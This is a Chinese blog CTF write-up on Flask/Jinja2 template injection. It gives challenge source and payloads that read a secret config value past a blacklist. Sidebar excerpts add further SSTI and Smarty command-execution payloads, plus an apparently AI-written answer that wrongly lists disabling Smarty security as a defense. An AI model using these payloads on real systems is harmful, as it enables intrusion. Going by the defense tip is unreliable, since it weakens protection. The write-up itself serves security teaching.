一天一道ctf 第31天(flask模板注入)

最新推荐文章于 2025-07-19 09:00:00 发布
原创 最新推荐文章于 2025-07-19 09:00:00 发布 · 2.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何利用SSTI漏洞在Web应用中执行代码,通过flask框架解析模板时的漏洞,尝试获取并展示FLAG。解题关键在于理解模板注入原理和避开黑名单。

[WesternCTF2018]shrine1
题目源码:

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

网上的解法都是大同小异,我在这里也仅作记录,后面有了更好的理解再回来补。
关于flask的简单介绍可以看这篇文章,读懂这道题的代码够了。
https://www.cnblogs.com/chaojiyingxiong/p/9549987.html
这道题是SSTI模板注入,简单理解下就是一些特殊情况数据会被当做代码来执行,而且得是{{}}里面的数据才行。在源码里可以看到@app.route('/shrine/<path:shrine>'),试着在URL后面加上/shrine/{{7*7}}/shrine/{{7*'7'}},可以看到算式被执行了
在这里插入图片描述
在这里插入图片描述
再在源码里找到app.config['FLAG'] = os.environ.pop('FLAG'),用os.environ取出Linux系统中的FLAG变量赋值给了app.config,猜测执行config就能得到flag。但是config和self都在黑名单里,而且这里是先替换()再过滤黑名单,没法用con(fig这类绕过。
WP是用了url_for和get_flashed_messages来获取current_app全局变量,current_app是一个flask的实例,算是通过对象之间的引用来获得被禁止对象信息的一种吧。__globals__是python里的函数,可以看到所有可读的全局变量。

/shrine/{{url_for.__globals__['current_app'].config['FLAG']}}

/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

在这里插入图片描述

scrawman
关注
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
2401_83703797的博客
04-07 973
获取属性的方式 Level 1 no waf {{}} 等价于 {%print%}盲注第一 判断出不出网发现不出网尝试写静态文件 请先了解 flask 静态目录概念成功写入static静态目录读取flagcat /app/flag 替换一下过滤引号完全可以替换为 request.args.参数名(get方式)可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)用[] 代替 . 其他方法 参考 获取属性的四种方法过滤了很多关键词编码绕
一天一道ctf 第38(报错模板注入 python沙盒逃逸 pin码生成)
scrawman的博客
07-20 847
[GYCTF2020]FlaskApp 先得到{{7*7}}的base64加密字符串,然后解密,输出no no no,看样子是被过滤了,这里可能有SSTI模板注入,主要是看怎么绕过过滤 随便输入字符串让base64解密报错得到文件位置/usr/local/lib/python3.7/site-packages/flask/app.py {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warni
CTF_Web:从0学习Flask模板注入(SSTI)
AFCC_的博客(Web_Dog)
08-30 6764
0x01 前言 最近在刷题的过程中发现服务端模板注入题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
flask完整一道
weixin_45046212的博客
05-23 254
from flask import * from flask_sqlalchemy import SQLAlchemy #导入captcha 用于生成验证码 from captcha.captcha import captcha #图文混排导包 from flask_uploads import UploadSet, IMAGES, configure_uploads import sys imp...
CTF之路:关于Flask模板注入
zw05011的博客
01-07 6213
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2401_84009749的博客
04-12 1616
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
CTF之服务器端模板注入(SSTI)与赛题
最新发布
Neolock的博客
07-19 1057
服务端模板注入(SSTI)漏洞是由于开发人员将用户输入直接拼接到模板中执行导致的。以Flask框架的Jinja2模板为例,攻击者可通过{{}}语法注入恶意代码。利用魔术方法如__class__、__bases__等可进行沙箱逃逸,最终通过找到包含__builtins__的可利用类(如warnings.catch_warnings)执行系统命令。CTF案例展示了如何逐步利用这些方法获取环境变量中的flag。关键点包括:判断模板引擎类型、回溯类继承关系、绕过字符过滤、最终执行任意命令获取敏感信息。
Flask模板注入编码姿势绕过-CMCTF
as you know, nlp is fantasitc!
04-25 1192
写在前面:通过这次比赛学到flask模板注入几个比较sao的绕过姿势 参考文章如下 ctfflask的ssti xctf高校网络安全挑战赛-华为云专场的MINE2 1、参考MINE2这道题目的一些过滤方法,以及一些替代方法 2、主要是利用attr获得属性,一些其他的编码方式如十六进制编码绕过,unicode编码绕过,格式化字符串绕过以及上面图片中提到的十六进制转字符串绕过 格式化字符串绕过payload ?msg={% print(session|attr("__init__"))|attr("__
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 1167
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
SSTI模板注入基础(Flask+Jinja2)
qq_55202378的博客
12-22 2430
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。由于python一切皆对象的特性,函数本质上也是对象,也存在类中的一些内置方法和内置属性,所以我们可以执行接下来的操作。是类中的一个内置属性,值是该实例的对应的类。
CTF赛题分析之 Flask 目录穿越
程序员阿飘 的博客
01-09 1891
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
第六十二题——[GYCTF2020]FlaskApp
分享简单的安全技术
05-10 476
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,base64加密页面,题目给出flask提示,猜测使用模板注入 第二步:构建漏洞 在加密页面将{{7+7}}进行base64加密后,将密文使用解密页面解码,发现执行了7+7算法,确定了存在模板注入漏洞。 第三步:获取flag 使用{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %
青少年CTF-Flask1
weixin_49803180的博客
04-04 497
qsnctf 上的题目
CTF中的Flask之bypass
qq_38755190的博客
01-31 2816
前言 继上次发布关于Flask的文章,之后说要结合的例题。今小小的总结一波,当然这就是入门,最近Flask题目也比较火热啊。下面我们开始吧。 存在模板注入漏洞的原因 首先在做题之前,我们先了解一下,存在漏洞的原因,Flask模板注入和大多数的SQL注入的原因差不多,都是因为没有严格的过滤变量导致的,存在变量可控,还有就是一些开发人员对安全的不重视等。当然,存在模板注入漏洞的原因还有使用不固定的模板模板注入的危险也是不容小觑的。 ctf中常见的例题 0x01 :XCTF-web高手区-Confusio
CTF实战(faka注入
Marsper的博客
09-18 1586
CTF实战 SQL注入(faka) 方法一:蚁键注入 首先获取实战链接 访问链接打开,并按上篇文章所学寻找相关post提交处,设法找到注入点,如图,得知付款处即为post提交处 打开burp实行抓包,检测注入点是否正确 将注入点链接抛入sqlmap中寻找准确注入点,找出数据库,爆出后台管理员密码 输入sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dum
flask之ssti模版注入从零到入门
Red Rapefruit
08-16 1221
前言 在学习ssti模版注入的时候,发现国内文章对于都是基于python基础之上的,对于基础代码讲的较少,而对于一些从事安全的新手师傅们,可能python只停留在写脚本上,所以上手的时候可能有点难度,毕竟不是搞python flask开发。就本人学习ssti而言,入手有点难度,所以特写此文,对于一些不需要深究python但是需要学习ssti的师傅,本文可能让你对flask的ssti有所了解。 ssti漏洞成因 ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tor
bugku CTF练习:Flask_FileUpload思路
xijieyuan2qi的博客
12-22 2282
https://ctf.bugku.com/challenges/detail/id/204.html 打开页面是这个样子。右键查看源代码。 它提示我说会用Python去执行。太棒了。 选择一张普通图片。点击上传。把流量转到burpsuite上。 把burpsuite上抓到的包发送到重发模块 把图片的内容删除。改成 import os print(os.system('ls -al')) 发现执行了Python,想了一下。应该是Python执行系统命令。 一步...
flask框架漏洞
JJT
05-14 8917
ctf里遇到了关于flask框架漏洞的题,此篇博文较为详细 转自https://www.jianshu.com/p/56614e46093e 一、简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。Flask 依赖两个外部库: Jinja2模板引擎和WSGI 工具集。 1、常用概念 WSGI 只是一种接口,它只适用于 Python 语言,其全称为 Web Server Gateway Interface,定义了 web服务器和 web应用之间的接口规范。也就是说,只要 w.
【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御
AAAAAAAAAAAA66的博客
12-19 9992
前面写CTF题目的时候做过几道SSTI模板注入题目。最近又遇到了一个不错的CTF网站, http://bmzclub.cn 里面不但有CTF题目,更重要的是有漏洞环境,不需要自己去一个一个去安装,对于我这样的懒人简直是福音。 目录 Flask模板注入简介 Flask和Jinja2介绍: 注入原理 复现 手动注入 工具探测 Flask模板注入简介 Flask和Jinja2介绍: 1.Flask是一个轻量级的基于Python的web框架。 2.Jinja 模板只是一个属于.
php的smarty模板注入ctf例题
03-10
<think>嗯,用户想找关于PHP Smarty模板注入CTF例题。我需要先回忆一下Smarty模板引擎的相关知识,以及常见的注入漏洞。Smarty在PHP中广泛使用,它的模板语法可能在某些版本中存在安全问题,尤其是在未正确过滤用户输入的情况下。 首先,我应该回顾一下Smarty的模板标签,比如{...},以及如何通过用户输入执行任意代码。例如,如果开发者直接将用户输入拼接到模板中,而没有进行适当的转义或过滤,攻击者可能插入恶意Smarty标签,导致服务器端模板注入(SSTI)。 接下来,我需要查找相关的CTF例题或漏洞示例。记得之前有个例子是利用{$smarty.version}来获取Smarty版本,这可能帮助攻击者选择合适的利用方式。另外,Smarty允许使用{system('命令')}来执行系统命令,如果模板引擎配置不当,这可能导致远程代码执行。 还要考虑PHP中变量名的转换规则,比如引用[1]提到的,PHP会将传入变量名中的某些字符转换为下划线,但如果有[符号提前出现,后面的点就不会被转换。这可能影响参数传递的方式,比如构造特定的参数名绕过过滤。 然后,参考其他模板注入的例子,比如Flask的SSTI漏洞(引用2和3),用户输入被直接嵌入模板导致漏洞。类似地,Smarty的注入可能也需要将用户输入作为模板的一部分处理,从而触发恶意代码。 另外,可能需要结合PHP的其他特性,比如反序列化漏洞(引用4中的例子),但用户的问题主要集中在Smarty模板注入,所以应聚焦于此。 最后,要确保提供的例题和Payload符合实际CTF中的情况,比如使用{system('cat /flag')}来读取flag文件,或者通过{php}标签(如果启用的话)执行PHP代码。需要注意的是,Smarty的安全配置可能禁用某些危险函数,因此需要根据版本和配置调整Payload。 总结步骤:解释Smarty模板注入的原理,给出一个CTF例题的示例代码,展示如何构造Payload利用漏洞,并提供相关问题供进一步学习。同时引用相关的参考资料,特别是关于PHP参数处理和SSTI的部分。</think>### PHP Smarty模板注入CTF例题解析 #### 示例CTF题目场景 假设存在以下PHP代码(基于Smarty模板引擎): ```php <?php require_once('smarty/libs/Smarty.class.php'); $smarty = new Smarty(); $name = $_GET['name']; $smarty->assign('name', $name); $smarty->display('template.tpl'); ?> ``` 其中`template.tpl`内容为: ```smarty Hello, {$name}! ``` #### 漏洞原理 1. **未过滤的用户输入**:`$name`直接通过`$_GET['name']`获取并传入模板,攻击者可构造包含Smarty标签的Payload。 2. **Smarty标签执行**:Smarty默认允许执行模板中的表达式,例如通过`{system('id')}`执行系统命令[^1]。 #### 利用Payload示例 1. **读取系统信息** ```http GET /vuln.php?name={$smarty.version} HTTP/1.1 ``` 响应中会返回Smarty版本,例如`3.1.36`。 2. **执行系统命令** ```http GET /vuln.php?name={system('cat /flag')} HTTP/1.1 ``` 若服务器配置允许,会输出flag文件内容[^2]。 3. **利用PHP函数**(需Smarty启用`{php}`标签) ```http GET /vuln.php?name={php}echo shell_exec('ls');{/php} HTTP/1.1 ``` 返回当前目录文件列表(仅适用于旧版本Smarty或未禁用`{php}`标签的情况)[^3]。 --- #### 防御建议 1. 过滤用户输入中的特殊符号(如`{`、`$`)。 2. 禁用Smarty危险函数: ```php $smarty->disableSecurity(); ``` 3. 更新Smarty至最新版本。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值